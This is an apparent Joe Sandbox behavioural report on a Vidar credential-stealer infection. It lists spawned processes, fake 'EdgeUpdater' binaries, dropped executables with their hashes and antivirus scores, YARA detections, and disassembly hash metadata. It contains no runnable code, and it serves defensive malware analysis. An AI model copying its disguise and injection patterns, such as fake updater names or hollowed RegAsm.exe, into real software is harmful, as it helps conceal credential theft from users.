                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                          Start time:08:43:05
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 71444
                                                                                                                                                                                                                                          Imagebase:0xda0000
                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                          Start time:08:43:12
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
                                                                                                                                                                                                                                          Imagebase:0x9c0000
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5 hash:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                          Start time:08:43:13
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6308 -s 81740
                                                                                                                                                                                                                                          Imagebase:0xda0000
                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                          Start time:08:43:16
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCGHCGIIDGD.exe"
                                                                                                                                                                                                                                          Imagebase:0x1c0000
                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                          Start time:08:43:16
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                          Start time:08:43:16
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\userCGHCGIIDGD.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\userCGHCGIIDGD.exe"
                                                                                                                                                                                                                                          Imagebase:0x490000
                                                                                                                                                                                                                                          File size:423'840 bytes
                                                                                                                                                                                                                                          MD5 hash:237AF39F8B579AAD0205F6174BB96239
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                          Start time:08:43:16
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                          Start time:08:43:17
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userJEHDHIEGII.exe"
                                                                                                                                                                                                                                          Imagebase:0x1c0000
                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                          Start time:08:43:17
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                          Start time:08:43:17
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\userJEHDHIEGII.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\userJEHDHIEGII.exe"
                                                                                                                                                                                                                                          Imagebase:0x7f0000
                                                                                                                                                                                                                                          File size:391'072 bytes
                                                                                                                                                                                                                                          MD5 hash:C7E7CFC3ED17AEF6C67C265389593EE3
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                          Start time:08:43:18
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                          Start time:08:43:18
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0xdd0000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000002.2984201099.0000000000582000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                          Start time:08:43:19
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x130000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                          Start time:08:43:19
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x350000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                          Start time:08:43:19
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x300000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                          Start time:08:43:19
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0xab0000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                          Start time:08:43:20
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
                                                                                                                                                                                                                                          Imagebase:0x290000
                                                                                                                                                                                                                                          File size:153'088 bytes
                                                                                                                                                                                                                                          MD5 hash:CA9BAE7D8FA56F97BB596D225E1469C3
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                          Start time:08:43:59
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\ProgramData\FIEHIIIJDA.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\FIEHIIIJDA.exe"
                                                                                                                                                                                                                                          Imagebase:0x810000
                                                                                                                                                                                                                                          File size:391'072 bytes
                                                                                                                                                                                                                                          MD5 hash:C7E7CFC3ED17AEF6C67C265389593EE3
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                          Start time:08:43:59
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                          Start time:08:44:00
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0xe40000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                          Start time:08:44:01
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\ProgramData\JJJEGCGDGH.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\JJJEGCGDGH.exe"
                                                                                                                                                                                                                                          Imagebase:0x640000
                                                                                                                                                                                                                                          File size:423'840 bytes
                                                                                                                                                                                                                                          MD5 hash:237AF39F8B579AAD0205F6174BB96239
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 61%, ReversingLabs
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                          Start time:08:44:01
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                          Start time:08:44:03
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x5a0000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                          Start time:08:44:03
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x7ff733a40000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                          Start time:08:44:04
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\ProgramData\EBAEBFIIEC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\EBAEBFIIEC.exe"
                                                                                                                                                                                                                                          Imagebase:0x4b0000
                                                                                                                                                                                                                                          File size:344'992 bytes
                                                                                                                                                                                                                                          MD5 hash:022CC85ED0F56A3F3E8AEC4AE3B80A71
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                          Start time:08:44:04
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                          Start time:08:44:06
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x1d0000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                          Start time:08:44:06
                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                          Imagebase:0x360000
                                                                                                                                                                                                                                          File size:65'440 bytes
                                                                                                                                                                                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 04E342E0 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: dee7d4e68e9e41d9b3a0337ccde1f86f78fe3b4425d149b3f499b04e2dedbcc7
                                                                                                                                                                                                                                            • Instruction ID: 2871bf266155aac6047ae867cd689d677978ce7fbb128b5736a3b71a420f08b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dee7d4e68e9e41d9b3a0337ccde1f86f78fe3b4425d149b3f499b04e2dedbcc7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D135F14109CFCB15DFA9C888AADBBB2EF85312B1495A6E416EB394D730ED12CB41
                                                                                                                                                                                                                                            Function 04E321FB Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0b9cf7c39d81547f8103014d9230a8d8f055b13a9c37620bf5a39abdae81483c
                                                                                                                                                                                                                                            • Instruction ID: df37a612156e5810c3e2f9195ef50228314efcc70072ed2c872ec73a262e493f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b9cf7c39d81547f8103014d9230a8d8f055b13a9c37620bf5a39abdae81483c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C341E331B042458FD719DB79C81836BBAB3BFC9201F24886AD246DB399DE34D9028751
                                                                                                                                                                                                                                            Function 04E32232 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9a2f510f9a0fcc8cf3e0bc059c32460ac9372a4678523540c8e7f546d59d8379
                                                                                                                                                                                                                                            • Instruction ID: 06cc5196e1d62809f823d2141d453fb1d7e00893620476032b41e502c8e4da67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a2f510f9a0fcc8cf3e0bc059c32460ac9372a4678523540c8e7f546d59d8379
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E410570B002418FD719DB79D91876FBAB7BFC9600F24886AD246EB398DE38DD018751
                                                                                                                                                                                                                                            Function 04E32240 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2127706554.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4e30000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 87afa7594a98617f4e9c7acc8012d14846382fe589092d5374504734bb60eb4a
                                                                                                                                                                                                                                            • Instruction ID: 3e803a84ae14a6de411f3df287648de5017bc4a8a42ff270f143f30cc9c9516f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87afa7594a98617f4e9c7acc8012d14846382fe589092d5374504734bb60eb4a
